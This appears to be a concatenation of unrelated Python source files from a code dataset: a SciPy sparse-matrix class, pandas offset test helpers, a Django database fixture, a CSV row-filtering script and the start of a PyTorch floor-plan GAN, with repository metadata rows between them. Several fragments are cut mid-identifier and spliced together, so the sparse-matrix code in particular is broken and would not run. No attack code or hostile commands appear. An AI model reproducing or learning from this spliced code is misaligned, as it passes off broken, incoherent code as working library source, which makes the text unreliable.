all_true = self.__class__(np.ones(self.shape, dtype=np.bool_))
res = self._binopt(other, '_gt_' if op_name == '_le_' else '_lt_')
return all_true - res
else:
raise ValueError("Operands could not be compared.")
def __lt__(self, other):
return self._inequality(other, operator.lt, '_lt_',
"Comparing a sparse matrix with a scalar "
"greater than zero using < is inefficient, "
"try using >= instead.")
def __gt__(self, other):
return self._inequality(other, operator.gt, '_gt_',
"Comparing a sparse matrix with a scalar "
"less than zero using > is inefficient, "
"try using <= instead.")
def __le__(self, other):
return self._inequality(other, operator.le, '_le_',
"Comparing a sparse matrix with a scalar "
"greater than zero using <= is inefficient, "
"try using > instead.")
def __ge__(self, other):
return self._inequality(other, operator.ge, '_ge_',
"Comparing a sparse matrix with a scalar "
"less than zero using >= is inefficient, "
"try using < instead.")
_scalar(other.toarray()[0, 0])
elif self.shape == (1, 1):
return other._mul_scalar(self.toarray()[0, 0])
elif self.shape[1] == 1 and other.shape[0] == 1:
return self._mul_sparse_matrix(other.tocsc())
elif self.shape[0] == 1 and other.shape[1] == 1:
return other._mul_sparse_matrix(self.tocsc())
elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
other = dia_matrix((other.toarray().ravel(), [0]),
shape=(other.shape[1], other.shape[1]))
return self._mul_sparse_matrix(other)
elif self.shape[0] == 1 and self.shape[1] == other.shape[1]:
copy = dia_matrix((self.toarray().ravel(), [0]),
shape=(self.shape[1], self.shape[1]))
return other._mul_sparse_matrix(copy)
elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
other = dia_matrix((other.toarray().ravel(), [0]),
shape=(other.shape[0], other.shape[0]))
return other._mul_sparse_matrix(self)
elif self.shape[1] == 1 and self.shape[0] == other.shape[0]:
copy = dia_matrix((self.toarray().ravel(), [0]),
shape=(self.shape[0], self.shape[0]))
return copy._mul_sparse_matrix(other)
else:
raise ValueError("inconsistent shapes")
other = np.atleast_2d(other)
if other.ndim != 2:
return np.multiply(self.toarray(), other)
# Single element / wrapped object.
if other.size == 1:
return self._mul_scalar(other.flat[0])
# Fast case for trivial sparse matrix.
elif self.shape == (1, 1):
return np.multiply(self.toarray()[0, 0], other)
from .coo import coo_matrix
ret = self.tocoo()
# Matching shapes.
if self.shape == other.shape:
data = np.multiply(ret.data, other[ret.row, ret.col])
# Sparse row vector times...
elif self.shape[0] == 1:
if other.shape[1] == 1: # Dense column vector.
data = np.multiply(ret.data, other)
elif other.shape[1] == self.shape[1]: # Dense matrix.
data = np.multiply(ret.data, other[:, ret.col])
else:
raise ValueError("inconsistent shapes")
row = np.repeat(np.arange(other.shape[0]), len(ret.row))
col = np.tile(ret.col, other.shape[0])
return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
shape=(other.shape[0], self.shape[1]),
copy=False)
# Sparse column vector times...
elif self.shape[1] == 1:
if other.shape[0] == 1: # Dense row vector.
data = np.multiply(ret.data[:, None], other)
elif other.shape[0] == self.shape[0]: # Dense matrix.
data = np.multiply(ret.data[:, None], other[ret.row])
else:
raise ValueError("inconsistent shapes")
row = np.repeat(ret.row, other.shape[1])
col = np.tile(np.arange(other.shape[1]), len(ret.col))
return coo_matrix((data.view(np.ndarray).ravel(), (row, col)),
shape=(self.shape[0], other.shape[1]),
copy=False)
# Sparse matrix times dense row vector.
elif other.shape[0] == 1 and self.shape[1] == other.shape[1]:
data = np.multiply(ret.data, other[:, ret.col].ravel())
# Sparse matrix times dense column vector.
elif other.shape[1] == 1 and self.shape[0] == other.shape[0]:
data = np.multiply(ret.data, other[ret.row].ravel())
else:
raise ValueError("inconsistent shapes")
ret.data = data.view(np.ndarray).ravel()
return ret
###########################
# Multiplication handlers #
###########################
def _mul_vector(self, other):
M, N = self.shape
# output array
result = np.zeros(M, dtype=upcast_char(self.dtype.char,
other.dtype.char))
# csr_matvec or csc_matvec
fn = getattr(_sparsetools, self.format + '_matvec')
fn(M, N, self.indptr, self.indices, self.data, other, result)
return result
def _mul_multivector(self, other):
M, N = self.shape
n_vecs = other.shape[1] # number of column vectors
result = np.zeros((M, n_vecs),
dtype=upcast_char(self.dtype.char, other.dtype.char))
# csr_matvecs or csc_matvecs
fn = getattr(_sparsetools, self.format + '_matvecs')
fn(M, N, n_vecs, self.indptr, self.indices, self.data,
other.ravel(), result.ravel())
return result
def _mul_sparse_matrix(self, other):
M, K1 = self.shape
K2, N = other.shape
major_axis = self._swap((M, N))[0]
other = self.__class__(other) # convert to this format
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices))
fn = getattr(_sparsetools, self.format + '_matmat_maxnnz')
nnz = fn(M, N,
np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype))
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=nnz)
indptr = np.empty(major_axis + 1, dtype=idx_dtype)
indices = np.empty(nnz, dtype=idx_dtype)
data = np.empty(nnz, dtype=upcast(self.dtype, other.dtype))
fn = getattr(_sparsetools, self.format + '_matmat')
fn(M, N, np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
self.data,
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype),
other.data,
indptr, indices, data)
return self.__class__((data, indices, indptr), shape=(M, N))
def diagonal(self, k=0):
rows, cols = self.shape
if k <= -rows or k >= cols:
raise ValueError("k exceeds matrix dimensions")
fn = getattr(_sparsetools, self.format + "_diagonal")
y = np.empty(min(rows + min(k, 0), cols - max(k, 0)),
dtype=upcast(self.dtype))
fn(k, self.shape[0], self.shape[1], self.indptr, self.indices,
self.data, y)
return y
diagonal.__doc__ = spmatrix.diagonal.__doc__
#####################
# Other binary ops #
#####################
def _maximum_minimum(self, other, npop, op_name, dense_check):
if isscalarlike(other):
if dense_check(other):
warn("Taking maximum (minimum) with > 0 (< 0) number results"
" to a dense matrix.", SparseEfficiencyWarning,
stacklevel=3)
other_arr = np.empty(self.shape, dtype=np.asarray(other).dtype)
other_arr.fill(other)
other_arr = self.__class__(other_arr)
return self._binopt(other_arr, op_name)
else:
self.sum_duplicates()
new_data = npop(self.data, np.asarray(other))
mat = self.__class__((new_data, self.indices, self.indptr),
dtype=new_data.dtype, shape=self.shape)
return mat
elif isdense(other):
return npop(self.todense(), other)
elif isspmatrix(other):
return self._binopt(other, op_name)
else:
raise ValueError("Operands not compatible.")
def maximum(self, other):
return self._maximum_minimum(other, np.maximum,
'_maximum_', lambda x: np.asarray(x) > 0)
maximum.__doc__ = spmatrix.maximum.__doc__
def minimum(self, other):
return self._maximum_minimum(other, np.minimum,
'_minimum_', lambda x: np.asarray(x) < 0)
minimum.__doc__ = spmatrix.minimum.__doc__
#####################
# Reduce operations #
#####################
def sum(self, axis=None, dtype=None, out=None):
# The spmatrix base class already does axis=0 and axis=1 efficiently
# so we only do the case axis=None here
if (not hasattr(self, 'blocksize') and
axis in self._swap(((1, -1), (0, 2)))[0]):
# faster than multiplication for large minor axis in CSC/CSR
res_dtype = get_sum_dtype(self.dtype)
ret = np.zeros(len(self.indptr) - 1, dtype=res_dtype)
major_index, value = self._minor_reduce(np.add)
ret[major_index] = value
ret = asmatrix(ret)
if axis % 2 == 1:
ret = ret.T
if out is not None and out.shape != ret.shape:
raise ValueError('dimensions do not match')
return ret.sum(axis=(), dtype=dtype, out=out)
# spmatrix will handle the remaining situations when axis
# is in {None, -1, 0, 1}
else:
return spmatrix.sum(self, axis=axis, dtype=dtype, out=out)
sum.__doc__ = spmatrix.sum.__doc__
def _minor_reduce(self, ufunc, data=None):
if data is None:
data = self.data
major_index = np.flatnonzero(np.diff(self.indptr))
value = ufunc.reduceat(data,
downcast_intp_index(self.indptr[major_index]))
return major_index, value
#######################
# Getting and Setting #
#######################
def _get_intXint(self, row, col):
M, N = self._swap(self.shape)
major, minor = self._swap((row, col))
indptr, indices, data = get_csr_submatrix(
M, N, self.indptr, self.indices, self.data,
major, major + 1, minor, minor + 1)
return data.sum(dtype=self.dtype)
def _get_sliceXslice(self, row, col):
major, minor = self._swap((row, col))
if major.step in (1, None) and minor.step in (1, None):
return self._get_submatrix(major, minor, copy=True)
return self._major_slice(major)._minor_slice(minor)
def _get_arrayXarray(self, row, col):
# inner indexing
idx_dtype = self.indices.dtype
M, N = self._swap(self.shape)
major, minor = self._swap((row, col))
major = np.asarray(major, dtype=idx_dtype)
minor = np.asarray(minor, dtype=idx_dtype)
val = np.empty(major.size, dtype=self.dtype)
csr_sample_values(M, N, self.indptr, self.indices, self.data,
major.size, major.ravel(), minor.ravel(), val)
if major.ndim == 1:
return asmatrix(val)
return self.__class__(val.reshape(major.shape))
def _get_columnXarray(self, row, col):
# outer indexing
major, minor = self._swap((row, col))
return self._major_index_fancy(major)._minor_index_fancy(minor)
def _major_index_fancy(self, idx):
idx_dtype = self.indices.dtype
indices = np.asarray(idx, dtype=idx_dtype).ravel()
_, N = self._swap(self.shape)
M = len(indices)
new_shape = self._swap((M, N))
if M == 0:
return self.__class__(new_shape)
row_nnz = np.diff(self.indptr)
idx_dtype = self.indices.dtype
res_indptr = np.zeros(M+1, dtype=idx_dtype)
np.cumsum(row_nnz[idx], out=res_indptr[1:])
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_row_index(M, indices, self.indptr, self.indices, self.data,
res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
def _major_slice(self, idx, copy=False):
if idx == slice(None):
return self.copy() if copy else self
M, N = self._swap(self.shape)
start, stop, step = idx.indices(M)
M = len(range(start, stop, step))
new_shape = self._swap((M, N))
if M == 0:
return self.__class__(new_shape)
row_nnz = np.diff(self.indptr)
idx_dtype = self.indices.dtype
res_indptr = np.zeros(M+1, dtype=idx_dtype)
np.cumsum(row_nnz[idx], out=res_indptr[1:])
if step == 1:
all_idx = slice(self.indptr[start], self.indptr[stop])
res_indices = np.array(self.indices[all_idx], copy=copy)
res_data = np.array(self.data[all_idx], copy=copy)
else:
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_row_slice(start, stop, step, self.indptr, self.indices,
self.data, res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
def _minor_index_fancy(self, idx):
idx_dtype = self.indices.dtype
idx = np.asarray(idx, dtype=idx_dtype).ravel()
M, N = self._swap(self.shape)
k = len(idx)
new_shape = self._swap((M, k))
if k == 0:
return self.__class__(new_shape)
# pass 1: count idx entries and compute new indptr
col_offsets = np.zeros(N, dtype=idx_dtype)
res_indptr = np.empty_like(self.indptr)
csr_column_index1(k, idx, M, N, self.indptr, self.indices,
col_offsets, res_indptr)
# pass 2: copy indices/data for selected idxs
col_order = np.argsort(idx).astype(idx_dtype, copy=False)
nnz = res_indptr[-1]
res_indices = np.empty(nnz, dtype=idx_dtype)
res_data = np.empty(nnz, dtype=self.dtype)
csr_column_index2(col_order, col_offsets, len(self.indices),
self.indices, self.data, res_indices, res_data)
return self.__class__((res_data, res_indices, res_indptr),
shape=new_shape, copy=False)
def _minor_slice(self, idx, copy=False):
if idx == slice(None):
return self.copy() if copy else self
M, N = self._swap(self.shape)
start, stop, step = idx.indices(N)
N = len(range(start, stop, step))
if N == 0:
return self.__class__(self._swap((M, N)))
if step == 1:
return self._get_submatrix(minor=idx, copy=copy)
# TODO: don't fall back to fancy indexing here
return self._minor_index_fancy(np.arange(start, stop, step))
def _get_submatrix(self, major=None, minor=None, copy=False):
M, N = self._swap(self.shape)
i0, i1 = _process_slice(major, M)
j0, j1 = _process_slice(minor, N)
if i0 == 0 and j0 == 0 and i1 == M and j1 == N:
return self.copy() if copy else self
indptr, indices, data = get_csr_submatrix(
M, N, self.indptr, self.indices, self.data, i0, i1, j0, j1)
shape = self._swap((i1 - i0, j1 - j0))
return self.__class__((data, indices, indptr), shape=shape,
dtype=self.dtype, copy=False)
def _set_intXint(self, row, col, x):
i, j = self._swap((row, col))
self._set_many(i, j, x)
def _set_arrayXarray(self, row, col, x):
i, j = self._swap((row, col))
self._set_many(i, j, x)
def _set_arrayXarray_sparse(self, row, col, x):
self._zero_many(*self._swap((row, col)))
M, N = row.shape
broadcast_row = M != 1 and x.shape[0] == 1
broadcast_col = N != 1 and x.shape[1] == 1
r, c = x.row, x.col
x = np.asarray(x.data, dtype=self.dtype)
if broadcast_row:
r = np.repeat(np.arange(M), len(r))
c = np.tile(c, M)
x = np.tile(x, M)
if broadcast_col:
r = np.repeat(r, N)
c = np.tile(np.arange(N), len(c))
x = np.repeat(x, N)
i, j = self._swap((row[r, c], col[r, c]))
self._set_many(i, j, x)
def _setdiag(self, values, k):
if 0 in self.shape:
return
M, N = self.shape
broadcast = (values.ndim == 0)
if k < 0:
if broadcast:
max_index = min(M + k, N)
else:
max_index = min(M + k, N, len(values))
i = np.arange(max_index, dtype=self.indices.dtype)
j = np.arange(max_index, dtype=self.indices.dtype)
i -= k
else:
if broadcast:
max_index = min(M, N - k)
else:
max_index = min(M, N - k, len(values))
i = np.arange(max_index, dtype=self.indices.dtype)
j = np.arange(max_index, dtype=self.indices.dtype)
j += k
if not broadcast:
values = values[:len(i)]
self[i, j] = values
def _prepare_indices(self, i, j):
M, N = self._swap(self.shape)
def check_bounds(indices, bound):
idx = indices.max()
if idx >= bound:
raise IndexError('index (%d) out of range (>= %d)' %
(idx, bound))
idx = indices.min()
if idx < -bound:
raise IndexError('index (%d) out of range (< -%d)' %
(idx, bound))
i = np.array(i, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
j = np.array(j, dtype=self.indices.dtype, copy=False, ndmin=1).ravel()
check_bounds(i, M)
check_bounds(j, N)
return i, j, M, N
def _set_many(self, i, j, x):
i, j, M, N = self._prepare_indices(i, j)
x = np.array(x, dtype=self.dtype, copy=False, ndmin=1).ravel()
n_samples = x.size
offsets = np.empty(n_samples, dtype=self.indices.dtype)
ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if ret == 1:
self.sum_duplicates()
csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if -1 not in offsets:
self.data[offsets] = x
return
else:
warn("Changing the sparsity structure of a {}_matrix is expensive."
" lil_matrix is more efficient.".format(self.format),
SparseEfficiencyWarning, stacklevel=3)
mask = offsets > -1
self.data[offsets[mask]] = x[mask]
mask = ~mask
i = i[mask]
i[i < 0] += M
j = j[mask]
j[j < 0] += N
self._insert_many(i, j, x[mask])
def _zero_many(self, i, j):
i, j, M, N = self._prepare_indices(i, j)
n_samples = len(i)
offsets = np.empty(n_samples, dtype=self.indices.dtype)
ret = csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
if ret == 1:
self.sum_duplicates()
csr_sample_offsets(M, N, self.indptr, self.indices, n_samples,
i, j, offsets)
self.data[offsets[offsets > -1]] = 0
def _insert_many(self, i, j, x):
order = np.argsort(i, kind='mergesort')
i = i.take(order, mode='clip')
j = j.take(order, mode='clip')
x = x.take(order, mode='clip')
do_sort = self.has_sorted_indices
idx_dtype = get_index_dtype((self.indices, self.indptr),
maxval=(self.indptr[-1] + x.size))
self.indptr = np.asarray(self.indptr, dtype=idx_dtype)
self.indices = np.asarray(self.indices, dtype=idx_dtype)
i = np.asarray(i, dtype=idx_dtype)
j = np.asarray(j, dtype=idx_dtype)
indices_parts = []
data_parts = []
ui, ui_indptr = np.unique(i, return_index=True)
ui_indptr = np.append(ui_indptr, len(j))
new_nnzs = np.diff(ui_indptr)
prev = 0
for c, (ii, js, je) in enumerate(zip(ui, ui_indptr, ui_indptr[1:])):
start = self.indptr[prev]
stop = self.indptr[ii]
indices_parts.append(self.indices[start:stop])
data_parts.append(self.data[start:stop])
uj, uj_indptr = np.unique(j[js:je][::-1], return_index=True)
if len(uj) == je - js:
indices_parts.append(j[js:je])
data_parts.append(x[js:je])
else:
indices_parts.append(j[js:je][::-1][uj_indptr])
data_parts.append(x[js:je][::-1][uj_indptr])
new_nnzs[c] = len(uj)
prev = ii
start = self.indptr[ii]
indices_parts.append(self.indices[start:])
data_parts.append(self.data[start:])
self.indices = np.concatenate(indices_parts)
self.data = np.concatenate(data_parts)
nnzs = np.empty(self.indptr.shape, dtype=idx_dtype)
nnzs[0] = idx_dtype(0)
indptr_diff = np.diff(self.indptr)
indptr_diff[ui] += new_nnzs
nnzs[1:] = indptr_diff
self.indptr = np.cumsum(nnzs, out=nnzs)
if do_sort:
self.has_sorted_indices = False
self.sort_indices()
self.check_format(full_check=False)
dtype=self.dtype)
tocoo.__doc__ = spmatrix.tocoo.__doc__
def toarray(self, order=None, out=None):
if out is None and order is None:
order = self._swap('cf')[0]
out = self._process_toarray_args(order, out)
if not (out.flags.c_contiguous or out.flags.f_contiguous):
raise ValueError('Output array must be C or F contiguous')
if out.flags.c_contiguous:
x = self.tocsr()
y = out
else:
x = self.tocsc()
y = out.T
M, N = x._swap(x.shape)
csr_todense(M, N, x.indptr, x.indices, x.data, y)
return out
toarray.__doc__ = spmatrix.toarray.__doc__
.fill(0)
self.indptr[1:][major_index] = val
np.cumsum(self.indptr, out=self.indptr)
self._shape = shape
resize.__doc__ = spmatrix.resize.__doc__
s__((data, self.indices, self.indptr),
shape=self.shape, dtype=data.dtype)
def _binopt(self, other, op):
other = self.__class__(other)
fn = getattr(_sparsetools, self.format + op + self.format)
maxnnz = self.nnz + other.nnz
idx_dtype = get_index_dtype((self.indptr, self.indices,
other.indptr, other.indices),
maxval=maxnnz)
indptr = np.empty(self.indptr.shape, dtype=idx_dtype)
indices = np.empty(maxnnz, dtype=idx_dtype)
bool_ops = ['_ne_', '_lt_', '_gt_', '_le_', '_ge_']
if op in bool_ops:
data = np.empty(maxnnz, dtype=np.bool_)
else:
data = np.empty(maxnnz, dtype=upcast(self.dtype, other.dtype))
fn(self.shape[0], self.shape[1],
np.asarray(self.indptr, dtype=idx_dtype),
np.asarray(self.indices, dtype=idx_dtype),
self.data,
np.asarray(other.indptr, dtype=idx_dtype),
np.asarray(other.indices, dtype=idx_dtype),
other.data,
indptr, indices, data)
A = self.__class__((data, indices, indptr), shape=self.shape)
A.prune()
return A
def _divide_sparse(self, other):
if other.shape != self.shape:
raise ValueError('inconsistent shapes')
r = self._binopt(other, '_eldiv_')
if np.issubdtype(r.dtype, np.inexact):
# inside it is either zero or defined by eldiv.
out = np.empty(self.shape, dtype=self.dtype)
out.fill(np.nan)
row, col = other.nonzero()
out[row, col] = 0
r = r.tocoo()
out[r.row, r.col] = r.data
out = matrix(out)
else:
# integers types go with nan <-> 0
out = r
return out
def _process_slice(sl, num):
if sl is None:
i0, i1 = 0, num
elif isinstance(sl, slice):
i0, i1, stride = sl.indices(num)
if stride != 1:
raise ValueError('slicing with step != 1 not supported')
i0 = min(i0, i1) # give an empty slice when i0 > i1
elif isintlike(sl):
if sl < 0:
sl += num
i0, i1 = sl, sl + 1
if i0 < 0 or i1 > num:
raise IndexError('index out of bounds: 0 <= %d < %d <= %d' %
(i0, i1, num))
else:
raise TypeError('expected slice or scalar')
return i0, i1
| true | true |
f72ef0d45883357b7389e4970e9395830f94792a | 80 | py | Python | run.py | 5x/ds-ants-geopy-extended | 6017b5da444cc33bde47f0c7cf2cf06a640a354c | [
"MIT"
] | null | null | null | run.py | 5x/ds-ants-geopy-extended | 6017b5da444cc33bde47f0c7cf2cf06a640a354c | [
"MIT"
] | null | null | null | run.py | 5x/ds-ants-geopy-extended | 6017b5da444cc33bde47f0c7cf2cf06a640a354c | [
"MIT"
] | 1 | 2019-12-06T10:20:08.000Z | 2019-12-06T10:20:08.000Z | from ants.ants import demonstrate
if __name__ == '__main__':
demonstrate()
| 16 | 33 | 0.725 | from ants.ants import demonstrate
if __name__ == '__main__':
demonstrate()
| true | true |
f72ef1faaa7d4dac60adb50472f713f106ff3158 | 758 | py | Python | venv/Lib/site-packages/pandas/tests/tseries/offsets/common.py | Jos33y/student-performance-knn | 4e965434f52dd6a1380904aa257df1edfaebb3c4 | [
"MIT"
] | 1 | 2021-02-06T21:00:00.000Z | 2021-02-06T21:00:00.000Z | venv/Lib/site-packages/pandas/tests/tseries/offsets/common.py | Jos33y/student-performance-knn | 4e965434f52dd6a1380904aa257df1edfaebb3c4 | [
"MIT"
] | null | null | null | venv/Lib/site-packages/pandas/tests/tseries/offsets/common.py | Jos33y/student-performance-knn | 4e965434f52dd6a1380904aa257df1edfaebb3c4 | [
"MIT"
] | null | null | null | """
Assertion helpers for offsets tests
"""
def assert_offset_equal(offset, base, expected):
actual = offset + base
actual_swapped = base + offset
actual_apply = offset.apply(base)
try:
assert actual == expected
assert actual_swapped == expected
assert actual_apply == expected
except AssertionError:
raise AssertionError(
f"\nExpected: {expected}\nActual: {actual}\nFor Offset: {offset})"
f"\nAt Date: {base}"
)
def assert_is_on_offset(offset, date, expected):
actual = offset.is_on_offset(date)
assert actual == expected, (
f"\nExpected: {expected}\nActual: {actual}\nFor Offset: {offset})"
f"\nAt Date: {date}"
)
| 28.074074 | 79 | 0.60686 |
def assert_offset_equal(offset, base, expected):
actual = offset + base
actual_swapped = base + offset
actual_apply = offset.apply(base)
try:
assert actual == expected
assert actual_swapped == expected
assert actual_apply == expected
except AssertionError:
raise AssertionError(
f"\nExpected: {expected}\nActual: {actual}\nFor Offset: {offset})"
f"\nAt Date: {base}"
)
def assert_is_on_offset(offset, date, expected):
actual = offset.is_on_offset(date)
assert actual == expected, (
f"\nExpected: {expected}\nActual: {actual}\nFor Offset: {offset})"
f"\nAt Date: {date}"
)
| true | true |
f72ef247c55be69d301aa864fe18c01087abc773 | 587 | py | Python | conftest.py | hackoregon/neighborhoods-2018 | 2e1bf837365182a212527e1afbedddc759d0ee78 | [
"MIT"
] | 6 | 2018-03-16T00:06:31.000Z | 2019-06-02T21:27:03.000Z | conftest.py | hackoregon/neighborhoods-2018 | 2e1bf837365182a212527e1afbedddc759d0ee78 | [
"MIT"
] | 53 | 2018-03-16T03:29:04.000Z | 2021-06-10T20:17:11.000Z | conftest.py | hackoregon/neighborhoods-2018 | 2e1bf837365182a212527e1afbedddc759d0ee78 | [
"MIT"
] | 1 | 2018-06-20T16:03:40.000Z | 2018-06-20T16:03:40.000Z | import pytest
import os
import neighborhoods_backend
@pytest.fixture(scope='session')
def django_db_setup():
neighborhoods_backend.settings.DATABASES['default'] = {
'ENGINE': 'django_db_geventpool.backends.postgresql_psycopg2',
'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),
'NAME': os.environ.get('POSTGRES_NAME'),
'USER': os.environ.get('POSTGRES_USER'),
'HOST': os.environ.get('POSTGRES_HOST'),
'PORT': os.environ.get('POSTGRES_PORT'),
'CONN_MAX_AGE': 0,
'OPTIONS': {
'MAX_CONNS': 20
}
}
| 29.35 | 70 | 0.633731 | import pytest
import os
import neighborhoods_backend
@pytest.fixture(scope='session')
def django_db_setup():
neighborhoods_backend.settings.DATABASES['default'] = {
'ENGINE': 'django_db_geventpool.backends.postgresql_psycopg2',
'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),
'NAME': os.environ.get('POSTGRES_NAME'),
'USER': os.environ.get('POSTGRES_USER'),
'HOST': os.environ.get('POSTGRES_HOST'),
'PORT': os.environ.get('POSTGRES_PORT'),
'CONN_MAX_AGE': 0,
'OPTIONS': {
'MAX_CONNS': 20
}
}
| true | true |
f72ef2fc7fec4b7efa2f516ad4626de6d8822b3b | 1,605 | py | Python | filter_from_list.py | skratchdot/media-tools | bca0c683fb637aeefda1c49454a118f809047d97 | [
"MIT"
] | 13 | 2019-12-09T07:56:13.000Z | 2021-08-03T01:45:53.000Z | filter_from_list.py | skratchdot/media-tools | bca0c683fb637aeefda1c49454a118f809047d97 | [
"MIT"
] | 1 | 2020-04-29T00:00:14.000Z | 2021-07-09T14:24:19.000Z | filter_from_list.py | skratchdot/media-tools | bca0c683fb637aeefda1c49454a118f809047d97 | [
"MIT"
] | 3 | 2020-04-27T15:36:36.000Z | 2021-03-29T17:52:35.000Z | # -*- coding: utf-8 -*-
import argparse
import inspect
import math
import os
from pprint import pprint
import sys
from lib.collection_utils import *
from lib.io_utils import *
from lib.math_utils import *
# input
parser = argparse.ArgumentParser()
parser.add_argument('-in', dest="INPUT_FILE", default="tmp/samples.csv", help="Input file")
parser.add_argument('-blist', dest="BLACK_LIST", default="", help="CSV file for blacklist of entries")
parser.add_argument('-wlist', dest="WHITE_LIST", default="", help="CSV file for whitelist of entries")
parser.add_argument('-key', dest="KEY", default="id", help="Key to match on")
parser.add_argument('-probe', dest="PROBE", action="store_true", help="Just show details?")
parser.add_argument('-out', dest="OUTPUT_FILE", default="", help="File to output results; leave empty to update input file")
a = parser.parse_args()
OUTPUT_FILE = a.OUTPUT_FILE if len(a.OUTPUT_FILE) > 0 else a.INPUT_FILE
# Read files
fieldNames, rows = readCsv(a.INPUT_FILE)
rowCount = len(rows)
if len(a.BLACK_LIST) > 0:
_, blist = readCsv(a.BLACK_LIST)
bids = set([item[a.KEY] for item in blist])
rows = [item for item in rows if item[a.KEY] not in bids]
rowCount = len(rows)
print("%s rows after blacklist filtering" % rowCount)
if len(a.WHITE_LIST) > 0:
_, wlist = readCsv(a.WHITE_LIST)
wids = set([item[a.KEY] for item in wlist])
rows = [item for item in rows if item[a.KEY] in wids]
rowCount = len(rows)
print("%s rows after whitelist filtering" % rowCount)
if a.PROBE:
sys.exit()
writeCsv(OUTPUT_FILE, rows, headings=fieldNames)
| 33.4375 | 124 | 0.709034 |
import argparse
import inspect
import math
import os
from pprint import pprint
import sys
from lib.collection_utils import *
from lib.io_utils import *
from lib.math_utils import *
parser = argparse.ArgumentParser()
parser.add_argument('-in', dest="INPUT_FILE", default="tmp/samples.csv", help="Input file")
parser.add_argument('-blist', dest="BLACK_LIST", default="", help="CSV file for blacklist of entries")
parser.add_argument('-wlist', dest="WHITE_LIST", default="", help="CSV file for whitelist of entries")
parser.add_argument('-key', dest="KEY", default="id", help="Key to match on")
parser.add_argument('-probe', dest="PROBE", action="store_true", help="Just show details?")
parser.add_argument('-out', dest="OUTPUT_FILE", default="", help="File to output results; leave empty to update input file")
a = parser.parse_args()
OUTPUT_FILE = a.OUTPUT_FILE if len(a.OUTPUT_FILE) > 0 else a.INPUT_FILE
fieldNames, rows = readCsv(a.INPUT_FILE)
rowCount = len(rows)
if len(a.BLACK_LIST) > 0:
_, blist = readCsv(a.BLACK_LIST)
bids = set([item[a.KEY] for item in blist])
rows = [item for item in rows if item[a.KEY] not in bids]
rowCount = len(rows)
print("%s rows after blacklist filtering" % rowCount)
if len(a.WHITE_LIST) > 0:
_, wlist = readCsv(a.WHITE_LIST)
wids = set([item[a.KEY] for item in wlist])
rows = [item for item in rows if item[a.KEY] in wids]
rowCount = len(rows)
print("%s rows after whitelist filtering" % rowCount)
if a.PROBE:
sys.exit()
writeCsv(OUTPUT_FILE, rows, headings=fieldNames)
| true | true |
f72ef3946956775383152170dd5a17cfd84646d4 | 5,126 | py | Python | src/models.py | athatheo/House-GANs-Reproduction | 00cc807f1e74f88eef5ed81615bfd87a39c52f94 | [
"MIT"
] | null | null | null | src/models.py | athatheo/House-GANs-Reproduction | 00cc807f1e74f88eef5ed81615bfd87a39c52f94 | [
"MIT"
] | null | null | null | src/models.py | athatheo/House-GANs-Reproduction | 00cc807f1e74f88eef5ed81615bfd87a39c52f94 | [
"MIT"
] | null | null | null | import torch
from torch import cat
from torch.nn import Conv2d
from torch.nn import Linear
from torch.nn import Module
from torch.nn import ConvTranspose2d
from torch.nn import LeakyReLU
from torch.nn import Tanh
from torch.nn import MaxPool2d
from torch import zeros_like
class ConvMPN(Module):
def __init__(self):
super().__init__()
self.conv1 = Conv2d(in_channels=3*16, out_channels=2*16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.conv2 = Conv2d(in_channels=2*16, out_channels=2*16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.conv3 = Conv2d(in_channels=2*16, out_channels=16, kernel_size=(3, 3), stride=(1, 1), padding=1)
self.leaky_relu = LeakyReLU(0.1)
def get_nodes(self, feature_vectors, edges, include_neighbours=True):
device = feature_vectors.device
nodes = zeros_like(feature_vectors, device=device)
if include_neighbours:
index = torch.where(edges[:, 1] > 0)
else:
index = torch.where(edges[:, 1] < 0)
src = torch.cat([edges[index[0], 0], edges[index[0], 2]]).long()
dst = torch.cat([edges[index[0], 2], edges[index[0], 0]]).long()
src = feature_vectors[src.contiguous()]
dst = dst.view(-1, 1, 1, 1).expand_as(src).to(device)
return nodes.scatter_add(0, dst, src)
def cat_nodes(self, feature_vectors, edges):
neighbouring_nodes = self.get_nodes(feature_vectors, edges, include_neighbours=True, )
non_neighbouring_nodes = self.get_nodes(feature_vectors, edges, include_neighbours=False)
encoding = torch.cat([feature_vectors, neighbouring_nodes, non_neighbouring_nodes], 1)
return encoding
def forward(self, x, edges):
x = self.cat_nodes(x, edges)
x = self.conv1(x)
x = self.leaky_relu(x)
x = self.conv2(x)
x = self.leaky_relu(x)
x = self.conv3(x)
x = self.leaky_relu(x)
return x
class Generator(Module):
def __init__(self):
super().__init__()
self.linear_reshape_1 = Linear(138, 1024)
self.conv_mpn_1 = ConvMPN()
self.upsample_1 = ConvTranspose2d(16, 16, 4, 2, 1)
self.conv_mpn_2 = ConvMPN()
self.upsample_2 = ConvTranspose2d(16, 16, 4, 2, 1)
self.conv_1 = Conv2d(16, 256, 3, 1, 1)
self.leaky_relu = LeakyReLU(0.1)
self.conv_2 = Conv2d(256, 128, 3, 1, 1)
self.conv_3 = Conv2d(128, 1, 3, 1, 1)
